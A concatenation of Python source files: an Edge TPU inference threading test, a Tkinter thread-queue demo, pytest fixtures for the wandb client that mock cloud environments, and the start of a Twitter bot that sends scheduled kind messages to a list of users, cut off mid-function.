        model_path = test_utils.test_data_path(
            'mobilenet_v1_1.0_224_quant_edgetpu.tflite')
        basic_engine = BasicEngine(model_path, edge_tpus[0])
        # The engine must be bound to exactly the device path requested.
        self.assertEqual(edge_tpus[0], basic_engine.device_path())

    def test_run_classification_and_detection_engine(self):
        def classification_task(num_inferences):
            # Runs on its own thread; classifies the same image repeatedly.
            tid = threading.get_ident()
            print('Thread: %d, %d inferences for classification task' %
                  (tid, num_inferences))
            labels = test_utils.read_label_file(
                test_utils.test_data_path('imagenet_labels.txt'))
            model_name = 'mobilenet_v1_1.0_224_quant_edgetpu.tflite'
            engine = ClassificationEngine(test_utils.test_data_path(model_name))
            print('Thread: %d, using device %s' % (tid, engine.device_path()))
            with test_utils.test_image('cat.bmp') as img:
                for _ in range(num_inferences):
                    ret = engine.classify_with_image(img, top_k=1)
                    self.assertEqual(len(ret), 1)
                    self.assertEqual(labels[ret[0][0]], 'Egyptian cat')
            print('Thread: %d, done classification task' % tid)

        def detection_task(num_inferences):
            # Runs on its own thread; detects objects in the same image repeatedly.
            tid = threading.get_ident()
            print('Thread: %d, %d inferences for detection task' %
                  (tid, num_inferences))
            model_name = 'ssd_mobilenet_v1_coco_quant_postprocess_edgetpu.tflite'
            engine = DetectionEngine(test_utils.test_data_path(model_name))
            print('Thread: %d, using device %s' % (tid, engine.device_path()))
            with test_utils.test_image('cat.bmp') as img:
                for _ in range(num_inferences):
                    ret = engine.detect_with_image(img, top_k=1)
                    self.assertEqual(len(ret), 1)
                    self.assertEqual(ret[0].label_id, 16)  # cat
                    self.assertGreater(ret[0].score, 0.7)
                    # Detected box must overlap the expected cat region (IoU > 0.88).
                    self.assertGreater(
                        test_utils.iou(
                            np.array([[0.1, 0.1], [0.7, 1.0]]), ret[0].bounding_box),
                        0.88)
            print('Thread: %d, done detection task' % tid)

        num_inferences = 2000
        # Run both engines at the same time on separate threads.
        t1 = threading.Thread(target=classification_task, args=(num_inferences,))
        t2 = threading.Thread(target=detection_task, args=(num_inferences,))
        t1.start()
        t2.start()
        t1.join()
        t2.join()
# Allow running this test module directly, outside a test runner.
if __name__ == '__main__':
    unittest.main()
|
gui_thread.py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Author: mcxiaoke
# @Date: 2015-08-11 12:00:11
from __future__ import print_function
import thread
import threading
import time
import Queue as queue
dataQueue = queue.Queue()
def producer(id):
    """Worker-thread body: push five tagged items onto the shared
    module-level dataQueue, 0.1 s apart."""
    count = 0
    while count < 5:
        print('put')
        time.sleep(0.1)
        dataQueue.put('[producer id=%d, count=%d]' % (id, count))
        count += 1
def consumer(root):
    """Poll the shared dataQueue from the Tk main loop and append any item to
    the `root` text widget; re-schedules itself every 500 ms via after().

    Runs on the GUI thread, so touching the widget here is safe.
    """
    try:
        # print('get')
        data = dataQueue.get(block=False)
    except queue.Empty:
        # Nothing produced yet -- just re-arm the timer below.
        pass
    else:
        root.insert('end', 'consumer got => %s\n' % str(data))
        root.see('end')
    root.after(500, lambda: consumer(root))
def makethreads():
    """Spawn four producer threads (Python 2 `thread` module)."""
    print('make threads')
    for i in range(4):
        thread.start_new_thread(producer, (i,))
from Tkinter import Tk, Button
from lib import ScrolledText
# 线程与界面更新
def _test_queue():
    """Function-based demo: a button spawns producers, while consumer() polls
    the queue and appends to a ScrolledText from the GUI thread."""
    root = Tk()
    Button(root, text='Make Threads', command=makethreads).pack()
    st = ScrolledText(root)
    st.pack()
    consumer(st)
    root.mainloop()
class ThreadGui(ScrolledText):
    """Class-based variant of the demo: the widget owns its queue, spawns
    producers on left-click, and polls for results on the GUI thread."""
    # Number of producer threads started per mouse click.
    threadPerClick = 4

    def __init__(self, parent=None):
        ScrolledText.__init__(self, parent)
        self.pack()
        self.dataQueue = queue.Queue()
        # Left-click spawns producer threads; consumer() starts the poll loop.
        self.bind('<Button-1>', self.makethreads)
        self.consumer()

    def producer(self, id):
        """Worker-thread body: only touches the thread-safe queue."""
        for i in range(10):
            time.sleep(0.5)
            self.dataQueue.put('[producer id=%d, count=%d]' % (id, i))

    def consumer(self):
        """Poll the queue every 100 ms on the GUI thread and display items."""
        try:
            data = self.dataQueue.get(block=False)
            print('new data: %s' % data)
        except queue.Empty:
            pass
        else:
            self.insert('end', 'consumer got => %s\n' % str(data))
            self.see('end')
        self.after(100, self.consumer)

    def makethreads(self, event):
        """Click handler: start threadPerClick producer threads."""
        for i in range(self.threadPerClick):
            threading.Thread(target=self.producer, args=(i,)).start()
# Demo entry point: run the class-based GUI; the function-based variant
# (_test_queue) is kept for comparison.
if __name__ == '__main__':
    #_test_queue()
    ThreadGui().mainloop()
|
conftest.py | import requests_mock
import os
from click.testing import CliRunner
import pytest
from wandb.history import History
from tests.api_mocks import *
import wandb
from wandb import wandb_run
from wandb.apis import InternalApi
import six
import json
import sys
import threading
import logging
from multiprocessing import Process
from vcr.request import Request
from wandb import wandb_socket
from wandb import env
from wandb import util
from wandb.wandb_run import Run
from tests import utils
from tests.mock_server import create_app
def pytest_runtest_setup(item):
    """Stamp each test's identity into WANDB_DESCRIPTION so files leaked
    outside tmp directories can be traced back to the test that wrote them."""
    description = "{}#{}".format(item.parent.name, item.name)
    os.environ["WANDB_DESCRIPTION"] = description
def request_repr(self):
    """Compact repr for recorded requests: "(METHOD) uri - query - vars: {...}".

    Non-JSON (or non-string) bodies render as "BINARY".
    """
    try:
        payload = json.loads(self.body)
    except (ValueError, TypeError):
        render = "BINARY"
    else:
        query = payload.get("query") or "no_query"
        # Keep only the operation name: text before the first "(" or newline.
        name = query.split("(")[0].split("\n")[0]
        files = payload.get("variables", {}).get("files", {})
        render = name + " - vars: " + str(files)
    return "({}) {} - {}".format(self.method, self.uri, render)
Request.__repr__ = request_repr
# To enable VCR logging uncomment below
#logging.basicConfig() # you need to initialize logging, otherwise you will not see anything from vcrpy
#vcr_log = logging.getLogger("vcr")
#vcr_log.setLevel(logging.INFO)
@pytest.fixture(scope='module')
def vcr_config():
    """VCR configuration: scrub auth headers and large/binary request bodies
    before they are written into cassettes.

    Fix over the original: `get("files", {}.keys())` had a misplaced
    parenthesis — the default was a dict_keys view and the present-case only
    worked because iterating a dict yields its keys. The intent
    (`.get("files", {}).keys()`) is now explicit.
    """
    def replace_body(request):
        # Don't record uploaded payloads; keep just enough to match requests.
        if "storage.googleapis.com" in request.uri:
            request.body = "BINARY DATA"
        elif "/file_stream" in request.uri:
            # Record only the file names being streamed.
            request.body = json.dumps(
                {"files": list(json.loads(request.body).get("files", {}).keys())})
        return request
    def replace_response_body(response, *args):
        """Remove gzip response from pypi and pin the advertised version."""
        if response["headers"].get("Access-Control-Expose-Headers") == ['X-PyPI-Last-Serial']:
            if response["headers"].get("Content-Encoding"):
                del response["headers"]["Content-Encoding"]
            response["body"]["string"] = '{"info":{"version": "%s"}' % wandb.__version__
        return response
    return {
        # Replace the Authorization request header with "DUMMY" in cassettes
        "filter_headers": [('authorization', 'DUMMY')],
        "match_on": ['method', 'uri', 'query', 'graphql'],
        "before_record": replace_body,
        "before_record_response": replace_response_body,
    }
@pytest.fixture(scope='module')
def vcr(vcr):
    """Extend pytest-vcr's `vcr` fixture with a semantic body matcher."""
    def vcr_graphql_matcher(r1, r2):
        # /graphql requests match on the (stripped) query text; /file_stream
        # requests match on the list of file names — both ignore volatile
        # fields like timestamps and offsets.
        if "/graphql" in r1.uri and "/graphql" in r2.uri:
            body1 = json.loads(r1.body.decode("utf-8"))
            body2 = json.loads(r2.body.decode("utf-8"))
            return body1["query"].strip() == body2["query"].strip()
        elif "/file_stream" in r1.uri and "/file_stream" in r2.uri:
            body1 = json.loads(r1.body.decode("utf-8"))
            body2 = json.loads(r2.body.decode("utf-8"))
            return body1["files"] == body2["files"]
        # NOTE(review): implicitly returns None (falsy -> no match) for every
        # other URI pair — confirm that is the intended behavior.
    vcr.register_matcher('graphql', vcr_graphql_matcher)
    return vcr
@pytest.fixture
def local_netrc(monkeypatch):
    """Run the test in an isolated filesystem and redirect any "netrc" path
    resolution there, so tests never read/write the user's real ~/.netrc."""
    with CliRunner().isolated_filesystem():
        # TODO: this seems overkill...
        origexpand = os.path.expanduser
        def expand(path):
            # Any path mentioning "netrc" resolves into the isolated dir;
            # everything else falls through to the real expanduser.
            return os.path.realpath("netrc") if "netrc" in path else origexpand(path)
        monkeypatch.setattr(os.path, "expanduser", expand)
        yield
@pytest.fixture
def history():
    """Yield a fresh Run().history backed by an isolated temp filesystem."""
    with CliRunner().isolated_filesystem():
        yield Run().history
@pytest.fixture
def wandb_init_run(request, tmpdir, request_mocker, upsert_run, query_run_resume_status,
                   upload_logs, monkeypatch, mocker, capsys, local_netrc):
    """Fixture that calls wandb.init(), yields a run (or an exception) that
    gets created, then cleans up afterward. This is meant to test the logic
    in wandb.init, it should generally not spawn a run_manager. If you need
    to test run_manager logic use that fixture.

    Behavior is steered by pytest markers on the requesting test:
    jupyter, headless, unconfigured, silent, args, resume,
    mocked_run_manager, mock_socket.
    """
    # save the environment so we can restore it later. pytest
    # may actually do this itself. didn't check.
    orig_environ = dict(os.environ)
    orig_namespace = None
    run = None
    try:
        with CliRunner().isolated_filesystem():
            upsert_run(request_mocker)
            if request.node.get_closest_marker('jupyter'):
                query_run_resume_status(request_mocker)

                # Minimal stand-in for an IPython shell so wandb's jupyter
                # integration path is exercised without IPython installed.
                def fake_ipython():
                    class Jupyter(object):
                        __module__ = "jupyter"

                        def __init__(self):
                            class Hook(object):
                                def register(self, what, where):
                                    pass
                            self.events = Hook()

                        def register_magics(self, magic):
                            pass
                    return Jupyter()
                wandb.get_ipython = fake_ipython
            # no i/o wrapping - it breaks pytest
            os.environ['WANDB_MODE'] = 'clirun'
            if request.node.get_closest_marker('headless'):
                mocker.patch('subprocess.Popen')
            else:
                def mock_headless(run, cloud=True):
                    print("_init_headless called with cloud=%s" % cloud)
                mocker.patch('wandb._init_headless', mock_headless)
            if not request.node.get_closest_marker('unconfigured'):
                os.environ['WANDB_API_KEY'] = 'test'
                os.environ['WANDB_ENTITY'] = 'test'
                os.environ['WANDB_PROJECT'] = 'unit-test-project'
            else:
                # when unconfigured we enable run mode to test missing creds
                os.environ['WANDB_MODE'] = 'run'
                monkeypatch.setattr('wandb.apis.InternalApi.api_key', None)
                monkeypatch.setattr(
                    'getpass.getpass', lambda x: "0123456789012345678901234567890123456789")
                assert InternalApi().api_key == None
            os.environ['WANDB_RUN_DIR'] = str(tmpdir)
            if request.node.get_closest_marker('silent'):
                os.environ['WANDB_SILENT'] = "true"
            assert wandb.run is None
            # NOTE(review): vars() returns the module's live __dict__, so the
            # final `assert vars(wandb) == orig_namespace` compares the dict
            # with itself and likely always passes — confirm intent.
            orig_namespace = vars(wandb)
            # Mock out run_manager, we add it to run to access state in tests
            orig_rm = wandb.run_manager.RunManager
            mock = mocker.patch('wandb.run_manager.RunManager')

            def fake_init(run, port=None, output=None, cloud=True):
                print("Initialized fake run manager")
                rm = fake_run_manager(mocker, run, cloud=cloud, rm_class=orig_rm)
                rm._block_file_observer()
                run.run_manager = rm
                return rm
            mock.side_effect = fake_init
            if request.node.get_closest_marker('args'):
                kwargs = request.node.get_closest_marker('args').kwargs
                # Unfortunate to enable the test to work
                if kwargs.get("dir"):
                    del os.environ['WANDB_RUN_DIR']
                if kwargs.get("tensorboard"):
                    # The test uses tensorboardX so we need to be sure it's imported
                    # we use get_module because tensorboardX isn't available in py2
                    wandb.util.get_module("tensorboardX")
                if kwargs.get("error"):
                    err = kwargs["error"]
                    del kwargs['error']
                    if err == "io":
                        @classmethod
                        def error(cls):
                            raise IOError
                        monkeypatch.setattr(
                            'wandb.wandb_run.Run.from_environment_or_defaults', error)
                    elif err == "socket":
                        class Error(object):
                            @property
                            def port(self):
                                return 123

                            def listen(self, secs):
                                return False, None
                        monkeypatch.setattr("wandb.wandb_socket.Server", Error)
                if kwargs.get('k8s') is not None:
                    token_path = "/var/run/secrets/kubernetes.io/serviceaccount/token"
                    crt_path = "/var/run/secrets/kubernetes.io/serviceaccount/ca.crt"
                    orig_exist = os.path.exists

                    # NOTE(review): `path in token_path` is a substring test,
                    # not equality — presumably intentional, but confirm.
                    def exists(path):
                        return True if path in token_path else orig_exist(path)

                    def magic(path, *args, **kwargs):
                        if path == token_path:
                            return six.StringIO('token')
                    mocker.patch('wandb.util.open', magic, create=True)
                    mocker.patch('wandb.util.os.path.exists', exists)
                    os.environ["KUBERNETES_SERVICE_HOST"] = "k8s"
                    os.environ["KUBERNETES_PORT_443_TCP_PORT"] = "123"
                    os.environ["HOSTNAME"] = "test"
                    if kwargs["k8s"]:
                        request_mocker.register_uri("GET", "https://k8s:123/api/v1/namespaces/default/pods/test",
                                                    content=b'{"status":{"containerStatuses":[{"imageID":"docker-pullable://test@sha256:1234"}]}}')
                    else:
                        request_mocker.register_uri("GET", "https://k8s:123/api/v1/namespaces/default/pods/test",
                                                    content=b'{}', status_code=500)
                    del kwargs["k8s"]
                if kwargs.get('sagemaker'):
                    del kwargs['sagemaker']
                    config_path = "/opt/ml/input/config/hyperparameters.json"
                    resource_path = "/opt/ml/input/config/resourceconfig.json"
                    secrets_path = "secrets.env"
                    os.environ['TRAINING_JOB_NAME'] = 'sage'
                    os.environ['CURRENT_HOST'] = 'maker'
                    orig_exist = os.path.exists

                    def exists(path):
                        return True if path in (config_path, secrets_path) else orig_exist(path)
                    mocker.patch('wandb.os.path.exists', exists)

                    # Fake `open()` returning canned sagemaker config files.
                    def magic(path, *args, **kwargs):
                        if path == config_path:
                            return six.StringIO('{"fuckin": "A"}')
                        elif path == resource_path:
                            return six.StringIO('{"hosts":["a", "b"]}')
                        elif path == secrets_path:
                            return six.StringIO('WANDB_TEST_SECRET=TRUE')
                        else:
                            return six.StringIO()
                    mocker.patch('wandb.open', magic, create=True)
                    mocker.patch('wandb.util.open', magic, create=True)
                elif kwargs.get("tf_config"):
                    os.environ['TF_CONFIG'] = json.dumps(kwargs['tf_config'])
                    del kwargs['tf_config']
                elif kwargs.get("env"):
                    for k, v in six.iteritems(kwargs["env"]):
                        os.environ[k] = v
                    del kwargs["env"]
            else:
                kwargs = {}
            if request.node.get_closest_marker('resume'):
                # env was leaking when running the whole suite...
                if os.getenv(env.RUN_ID):
                    del os.environ[env.RUN_ID]
                query_run_resume_status(request_mocker)
                os.mkdir(wandb.wandb_dir())
                with open(os.path.join(wandb.wandb_dir(), wandb_run.RESUME_FNAME), "w") as f:
                    f.write(json.dumps({"run_id": "test"}))
            try:
                print("Initializing with", kwargs)
                run = wandb.init(**kwargs)
                if request.node.get_closest_marker('resume') or request.node.get_closest_marker('mocked_run_manager'):
                    # Reset history
                    run._history = None
                    rm = wandb.run_manager.RunManager(run)
                    rm.init_run(os.environ)
                if request.node.get_closest_marker('mock_socket'):
                    run.socket = mocker.MagicMock()
                assert run is wandb.run
                assert run.config is wandb.config
            except wandb.LaunchError as e:
                # Tests marked to expect a failure receive the exception
                # object instead of a run.
                print("!!! wandb LaunchError raised")
                run = e
            yield run
            if hasattr(run, "run_manager"):
                print("Shutting down run manager")
                run.run_manager.test_shutdown()
    finally:
        # restore the original environment
        os.environ.clear()
        os.environ.update(orig_environ)
        wandb.uninit()
        wandb.get_ipython = lambda: None
        assert vars(wandb) == orig_namespace
def fake_run_manager(mocker, run=None, cloud=True, rm_class=wandb.run_manager.RunManager):
    """Build a mostly-mocked RunManager wired to a real local socket.

    Starts the socket listener and the manager's _sync_etc loop on
    background threads and attaches a ``test_shutdown()`` hook to join
    them. All tee/stream/meta components are MagicMocks.
    """
    # NOTE: This will create a run directory so make sure it's called in an isolated file system
    # We have an optional rm_class object because we mock it above so we need it before it's mocked
    api = InternalApi(load_settings=False)
    api.set_setting('project', 'testing')
    if wandb.run is None:
        wandb.run = run or Run()
        wandb.config = wandb.run.config
    wandb.run._api = api
    wandb.run._mkdir()
    wandb.run.socket = wandb_socket.Server()
    api.set_current_run_id(wandb.run.id)
    mocker.patch('wandb.apis.internal.FileStreamApi')
    api._file_stream_api = mocker.MagicMock()
    run_manager = rm_class(wandb.run, cloud=cloud, port=wandb.run.socket.port)

    # Stand-in for the headless child process: always "running", no-op exit.
    class FakeProc(object):
        def poll(self):
            return None

        def exit(self, code=0):
            return None
    run_manager.proc = FakeProc()
    run_manager._meta = mocker.MagicMock()
    run_manager._stdout_tee = mocker.MagicMock()
    run_manager._stderr_tee = mocker.MagicMock()
    run_manager._output_log = mocker.MagicMock()
    run_manager._stdout_stream = mocker.MagicMock()
    run_manager._stderr_stream = mocker.MagicMock()
    run_manager.mirror_stdout_stderr = mocker.MagicMock()
    run_manager.unmirror_stdout_stderr = mocker.MagicMock()
    socket_thread = threading.Thread(
        target=wandb.run.socket.listen)
    socket_thread.start()
    run_manager._socket.ready()
    thread = threading.Thread(
        target=run_manager._sync_etc)
    thread.daemon = True
    thread.start()

    def test_shutdown():
        # Signal the socket server to finish, then join both worker threads.
        if wandb.run and wandb.run.socket:
            wandb.run.socket.done()
            # TODO: is this needed?
            socket_thread.join()
            thread.join()
    run_manager.test_shutdown = test_shutdown
    run_manager._unblock_file_observer()
    run_manager._file_pusher._push_function = mocker.MagicMock()
    return run_manager
@pytest.fixture
def run_manager(mocker, request_mocker, upsert_run, query_viewer):
    """Emulate run_manager headless mode in a single process.

    Call ``run_manager.test_shutdown()`` in the test to join the
    background threads.
    """
    with CliRunner().isolated_filesystem():
        for register in (query_viewer, upsert_run):
            register(request_mocker)
        manager = fake_run_manager(mocker)
        yield manager
        wandb.uninit()
@pytest.fixture
def loggedin():
    """Simulate a logged-in user by injecting a dummy 40-char API key."""
    saved_environ = dict(os.environ)
    try:
        with CliRunner().isolated_filesystem():
            os.environ["WANDB_API_KEY"] = "X" * 40
            yield os.environ
    finally:
        os.environ.clear()
        os.environ.update(saved_environ)
        wandb.uninit()
@pytest.fixture
def dryrun():
    """Run the test under WANDB_MODE=dryrun in an isolated filesystem."""
    saved_environ = dict(os.environ)
    try:
        with CliRunner().isolated_filesystem():
            os.environ["WANDB_MODE"] = "dryrun"
            yield os.environ
    finally:
        os.environ.clear()
        os.environ.update(saved_environ)
        wandb.uninit()
# Disabled: with this autouse fixture active, mocked sessions fail with
# "Error: 'Session' object has no attribute 'request'"
# @pytest.fixture(autouse=True)
# def no_requests(monkeypatch):
#     monkeypatch.delattr("requests.sessions.Session.request")
@pytest.fixture
def request_mocker(request):
    """
    :param request: pytest request object used to register cleanup.
    :return: Returns instance of requests mocker used to mock HTTP calls.
    """
    mock = requests_mock.Mocker()
    mock.start()
    # Stop intercepting HTTP once the requesting test finishes.
    request.addfinalizer(mock.stop)
    return mock
@pytest.fixture(autouse=True)
def preserve_environ():
    """Snapshot os.environ before each test and restore it afterwards."""
    snapshot = os.environ.copy()
    try:
        yield
    finally:
        os.environ.clear()
        os.environ.update(snapshot)
@pytest.fixture(autouse=True)
def check_environ():
    """Warn about WANDB_ environment variables the user has set

    Sometimes it's useful to set things like WANDB_DEBUG intentionally, or
    set other things for hacky debugging, but we want to make sure the user
    knows about it.
    """
    # WANDB_DESCRIPTION is ignored because pytest_runtest_setup() sets it
    # intentionally; WANDB_TEST is our own switch.
    ignored = ('WANDB_TEST', 'WANDB_DESCRIPTION')
    suspicious = [key for key in os.environ
                  if key.startswith('WANDB_') and key not in ignored]
    if suspicious:
        wandb.termwarn('You have WANDB_ environment variable(s) set. These may interfere with tests:')
        for key in suspicious:
            wandb.termwarn(' {} = {}'.format(key, repr(os.environ[key])))
@pytest.fixture
def mock_server(mocker, request_mocker):
    """Patch every HTTP transport onto an in-process flask test client."""
    app = create_app()
    fake_requests = utils.RequestsMock(app.test_client(), {})
    for target in ("gql.transport.requests.requests",
                   "wandb.apis.file_stream.requests",
                   "wandb.apis.internal.requests"):
        mocker.patch(target, fake_requests)
    return fake_requests
@pytest.fixture
def live_mock_server(request):
    """Run the mock server app in a child process (default port 8765)."""
    marker = request.node.get_closest_marker('port')
    port = marker.args[0] if marker else 8765
    server = Process(target=create_app().run,
                     kwargs={"port": port, "debug": True, "use_reloader": False})
    server.start()
    yield server
    server.terminate()
    server.join()
|
tweet.py | #!/usr/bin/env python3
# Tweet at the users found in the user id text file (specified in setup.py)
# Not to be run simultaneously as the find_users.py script
# Also have a streamer that replies to replies
# OK, so what's the plan?
# I want to send people tweets at times when they tend to send their offensive tweets.
# This is to magnify the impact of the kind tweet.
# We really don't want the bot getting suspended for sending unsolicited tweets to people.
# Therefore, this procedure needs to be thoroughly scrutinized before launching the actual project.
# This is perhaps not very important. The timing, I mean.
# Rather, I should focus on getting the measurement correct, while still ensuring that each person gets sent one tweet a week.
# Thus, have a week-long loop. At start, it randomly scrambles the user id list, and at a set interval tweets to the users in the list's order.
# This will make the sending of the tweets truly random, and perfectly spread out (so as to minimize the risk of violating the API restrictions).
# import twythonaccess to be able to send tweets
import twythonaccess
from twythonaccess import TwitterApp
# import setup
import setup
# import the streamer
from streamer import TweetStreamer
# import threading
from threading import Thread
# import datetime
from datetime import datetime
# errors!
import error_messenger
# for shuffling the user ids list
import random
# we need to be able to sleep
import time
# The unscrambled list of user ids, as loaded directly from the user id text file.
user_ids = []
# Cache of user_id -> screen name, filled by set_up() via the Twitter API.
screen_name_for_user_id = {}
# a dictionary of user_id -> sent responses, so as to not send the same response to the same user twice
# thus, dict<int, set<string>>, as expressed in some pseudo-c++ syntax (set instead of list?)
# remember that, if this process is run for a long time, you may run out of responses. thus, be sure to reset the list of taken responses when it has the same length as the responses list itself
sent_responses_to_user = {}
# a list of the responses, as loaded directly from the responses.txt text file
# (consequently, one cannot simply update the responses text file to make the bot send the new responses – this process needs to be restarted as well)
responses = []
# When this flag is set to true, all processes and threads should ideally stop executing.
self_destruction_flag = False
# we need the mentions streamer as a global, so as to be able to disconnect it gracefully at self destruction
mentions_streamer_object = None
# Entry point: runs the mentions streamer and the weekly tweet loop concurrently.
def main():
    """Start the mentions streamer and the tweet loop on separate threads."""
    print("main")
    # setup is important
    set_up()
    print("setup done")
    streamer_thread = Thread(target=mentions_streamer)
    loop_thread = Thread(target=tweet_loop)
    for worker in (streamer_thread, loop_thread):
        worker.start()
# We need a way to self destruct, so as to be able to stop sending tweets.
def self_destruct():
    """Signal all loops to stop and disconnect the mentions streamer."""
    global self_destruction_flag, mentions_streamer_object
    # Flip the flag first so the worker loops notice before the
    # streamer connection drops.
    self_destruction_flag = True
    mentions_streamer_object.disconnect()
def set_up():
    """Load user ids and responses, and resolve each user's screen name.

    Populates the module globals: user_ids, screen_name_for_user_id,
    sent_responses_to_user and responses. Users whose screen name cannot
    be fetched are dropped from user_ids.
    """
    # do some setup first, like loading the user ids into a list,
    # and also create the dictionary of user ids to sent responses
    # finally, load the list of responses from the responses text file, for easy access
    # load the user ids
    global user_ids
    with open(setup.USER_IDS_PATH, "r") as user_ids_file:
        for line in user_ids_file:
            # first whitespace-separated token on the line is the user id
            sml = [x for x in line.strip().split()]
            user_id = int(sml[0])
            user_ids.append(user_id)
    # find the screen name for every user id
    global screen_name_for_user_id
    # if we can't get the screen name, then something's wrong
    # add that user to the remove queue
    remove_list = []
    for user_id in user_ids:
        # use the mentions app for checking up the user
        # this is since it is less critical than the tweeting app, while having the same privileges
        # if rate limited, wait for 1 minute, and then try again
        # the show user request can be sent 900 times per 15 minute window
        while twythonaccess.currently_rate_limited(TwitterApp.mentions, 900):
            time.sleep(60)
        # get the screen name of the user
        try:
            screen_name = twythonaccess.authorize(TwitterApp.mentions).show_user(user_id = user_id)["screen_name"]
            screen_name_for_user_id[user_id] = screen_name
        except Exception as exception:
            # can't find screen name of this user
            print(exception)
            remove_list.append(user_id)
            print("Can't find screen name of user with id: " + str(user_id))
    # NOTE(review): this error message is sent even when remove_list is
    # empty ("Removing 0 users...") — confirm that is intended.
    error_messenger.send_error_message("Removing " + str(len(remove_list)) + " users due to inability to get their screen name.", "tweet.py > set_up()")
    for user_id in remove_list:
        user_ids.remove(user_id)
    # create the dictionary of empty sets per each user id
    global sent_responses_to_user
    for user_id in user_ids:
        sent_responses_to_user[user_id] = set()
    # load the responses from the responses.txt file
    global responses
    with open(setup.RESPONSES_PATH, "r") as responses_file:
        for line in responses_file:
            response = line.strip()
            responses.append(response)
# Set up the mentions streamer, viz. the streamer that should find all tweets mentioning the bot, and reply to them with emoji hearts
# Runs indefinitely, and thus needs error handling
def mentions_streamer():
    """Stream tweets mentioning the bot and dispatch them to new_mention().

    Reconnects immediately on broken-read errors; on any other error it
    reports the failure and sleeps one hour before retrying. Exits when
    self_destruction_flag is set.
    """
    print("mentions streamer")
    # initialize the mentions streamer
    # use the mentions app
    global mentions_streamer_object
    mentions_streamer_object = TweetStreamer(setup.MENTIONS_CONSUMER_KEY, setup.MENTIONS_CONSUMER_SECRET, setup.MENTIONS_ACCESS_TOKEN, setup.MENTIONS_ACCESS_TOKEN_SECRET)
    # for error logs
    mentions_streamer_object.arvid220u_error_title = "tweet.py > mentions_streamer()"
    # add the observer (the new_mention method)
    mentions_streamer_object.arvid220u_add_observer(new_mention)
    # start streaming
    # wrap it in error handling
    while not self_destruction_flag:
        try:
            # RTs will automatically be discarded (default setting)
            # check for tweets referencing self
            mentions_streamer_object.statuses.filter(track=("@" + setup.TWITTER_USERNAME))
        except Exception as exception:
            # If self destruction flag is true, then continue (same as break)
            if self_destruction_flag:
                break
            # check if exception is incomplete read: then, just restart immediately
            # (dead code kept for reference — superseded by the startswith check below)
            """if str(exception) == "('Connection broken: IncompleteRead(0 bytes read, 1 more expected)', IncompleteRead(0 bytes read, 1 more expected))":
            continue
            if str(exception) == "('Connection broken: IncompleteRead(0 bytes read, 2 more expected)', IncompleteRead(0 bytes read, 2 more expected))":
            continue"""
            if str(exception).startswith("('Connection broken: IncompleteRead"):
                print("restarting")
                continue
            # print the exception and then sleep for an hour,
            # and hope that the problem will resolve itself, magically
            # (as it almost always does, since the problem is probably in Twitter's servers, or something)
            print("tweet.py > mentions_streamer(): ")
            print(exception)
            error_messenger.send_error_message(exception, "tweet.py > mentions_streamer()")
            print("will sleep for one hour to avoid exception")
            time.sleep(60*60)
            print("finished sleep in tweet.py > mentions_streamer. will now start anew")
# Map: user_id -> timestamp (datetime, UTC)
# Timestamp records when the user with the id user_id was replied to.
# This is to ensure that no more than a maximum of one reply per day is sent to one and the same user.
replied_to_users = {}
# Whenever a new tweet referencing self is discovered, this method is called
# The argument is the ordinary tweet dictionary, as provided by twitter, without any changes
def new_mention(tweet):
    """Reply to a tweet that mentions the bot, at most once per user per day."""
    # if the self destruction flag is on, then return immediately
    if self_destruction_flag:
        return
    # first check so that the user actually did mention the bot
    did_mention = False
    for user_mention in tweet["entities"]["user_mentions"]:
        if user_mention["screen_name"] == setup.TWITTER_USERNAME:
            did_mention = True
    if not did_mention:
        # return early if no mention
        # it's strange that this can happen
        return
    # Policy: reply at most once per user within a 24h window (see
    # replied_to_users above), rather than once ever.
    # the user to respond to
    user_id = tweet["user"]["id"]
    # check if that user is in the replied to users
    global replied_to_users
    if user_id in replied_to_users:
        # check whether the time passed since timestamp is less than one day
        now_time = datetime.utcnow()
        if (now_time - replied_to_users[user_id]).total_seconds() < 24*60*60:
            # simply return here, prematurely
            return
        # don't do anything. we will update the timestamp at a later stage
    # NOTE(review): an earlier comment promised a rate-limit check for the
    # mentions app here, but none is performed — send_tweet's return value
    # is relied on instead. Confirm this is intended.
    reply_to_screen_name = tweet["user"]["screen_name"]
    # create the tweet
    reply_tweet = "@" + reply_to_screen_name + " " + setup.REPLY_TWEET
    # send the tweet, and check whether it was actually sent
    if twythonaccess.send_tweet(reply_tweet, TwitterApp.mentions, in_reply_to_status_id = tweet["id"]):
        # yay, tweet was sent
        # now add this user to the replied to users map, along with the current timestamp
        replied_to_users[user_id] = datetime.utcnow()
# The tweet loop runs indefinitely, sending one tweet per week per user, at a randomly assigned time.
# Needs thorough error handling.
# If an error occurs here, a lot is lost on the experiment
# Therefore, immediately retry a couple of times upon receiving the error
def tweet_loop():
    """Week-long loop: send exactly one (new) response to every user per week.

    Each iteration shuffles the user list, spaces the sends evenly over
    ~one week, and escalates through retry / backup-mode / give-up on
    repeated send failures.
    """
    global user_ids
    global sent_responses_to_user
    global responses
    global screen_name_for_user_id
    print("tweet loop")
    # have an infinte loop
    # every loop iteration should take one week, and in each iteration, exactly one tweet should be sent to each user
    while not self_destruction_flag:
        start_time = datetime.utcnow()
        # first, scramble the user ids list so as to make the sending of the users completely random
        user_ids_sendlist = user_ids[:]
        random.shuffle(user_ids_sendlist)
        # calculate the interval, so as to make the loop week-long
        # we do care about achieving perfect week-loops, which is why we make the interval a tiny bit shorter (one hour) than actually needed, and storing the starting time
        # (the reason we care is for measuring purposes, and credibility in statistics, etc)
        # the tweet interval is measured in seconds
        # NOTE(review): raises ZeroDivisionError when user_ids is empty.
        tweet_interval = ((7*24*60*60-60*60) / len(user_ids))
        # now iterate over each user id in the sendlist
        for user_id in user_ids_sendlist:
            # if we are in self destruction, then return here (and yes, I know, it may be that not all users receive the same amount of tweets, this way)
            # (continuing thought: but it is of utter importance to have the treatment stop at the given signal)
            if self_destruction_flag:
                break
            # randomly choose a tweet from the response list
            # do it repeatedly until a response that has not yet been sent to this user is found
            # first, check whether the response set for this user has a length that is equal to the response list – if so, reset it
            if len(sent_responses_to_user[user_id]) >= len(responses):
                sent_responses_to_user[user_id] = set()
            response = responses[random.randint(0,len(responses)-1)]
            while response in sent_responses_to_user[user_id]:
                response = responses[random.randint(0,len(responses)-1)]
            # send this response to the user, mentioning them
            response_tweet = "@" + screen_name_for_user_id[user_id] + " " + response + " " + setup.RESPONSE_SUFFIX
            # send this tweet
            # don't care whether it is sent or not – as long as there are not too many users, it should be sent without any problem
            # risk is twitter banning the bot due to its messages being considered unsolicited and rude
            try:
